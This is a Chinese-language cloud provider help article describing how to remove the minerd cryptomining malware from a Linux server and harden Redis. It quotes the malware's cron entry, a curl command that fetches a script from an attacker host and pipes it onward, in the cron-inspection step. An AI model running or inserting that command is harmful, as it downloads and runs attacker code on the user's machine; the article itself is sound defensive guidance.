互盟云> 帮助中心> 安全类问题> linux 云主机中挖矿病毒处理案例

linux 云主机中挖矿病毒处理案例

如果发现云服务器资源使用异常,检查发现CPU的资源占用很高,使用top命令查看了一下,如果发现是一个名为minerd的进程占用了很高的CPU资源,minerd之前听说过,是一种挖矿病毒,下面是把minerd给杀掉的过程。


步骤如下:


1、关闭访问挖矿服务器的访问


1
2
[root@fuwuqi~]# iptables -A INPUT -s xmr.crypto-pool.fr -j DROP  
[root@fuwuqi~]# iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP


2、查看定时任务


1
2
3
4
[root@fuwuqi ~]# cd /var/spool/cron/
[root@fuwuqi cron]# ll
-rw------- 1 root root 263 Nov  2 23:24 root
[root@fuwuqi cron]# cat root

*/15  * * * *  curl  -fsSL  https://r.chanstring.com/pm.sh?0706  |


1
2
3
4
[root@fuwuqi ~]# cd /var/spool/cron/crontabs
[root@fuwuqi crontabs]# ll
-rw------- 1 root root 263 Nov  2 23:24 root
[root@fuwuqi cron]# cat root

*/15  * * * *  curl  -fsSL  https://r.chanstring.com/pm.sh?0706  |



注意:

(1)如果/var/spool/cron/root和/var/spool/cron/crontabs/root定时任务中有上面如图所示的定时内容,就把上面的定时任务给删除。再次提醒,只删除上图中的定时任务就可以了,其他的定时任务不要乱删,误删后果自负。

(2)并不是所有中minerd病毒的服务器都会有定时任务,我遇到的就没有定时任务,上面所述是出现定时任务的解决方法。


3、找到挖矿程序minerd


1
2
[root@fuwuqi cron]# find / -name minerd*
/tmp/minerd


4、取消挖矿程序minerd的执行权限


1
2
[root@fuwuqi cron]# cd /tmp
[root@fuwuqi tmp]# chmod -x minerd


注意:在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。


5、杀掉minerd进程


1
2
[root@fuwuqi tmp]# pkill minerd
[root@fuwuqi tmp]# rm minerd                          //删除minerd程序


使用top命令查看,发现minerd进程消失,过几分钟之后进程没有再起来,挖矿程序minerd被消灭了,好开心啊!


6、总结:由于服务器上安装了redis,黑客利用redis的漏洞获得了服务器的访问权限。


7、建议如下:


  (1)修复 redis 的配置


    a、配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379。

    b、配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中。

    c、配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度


  (2)打开 /root/.ssh/authorized_keys, 删除你不认识的账号。


  (3)查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉。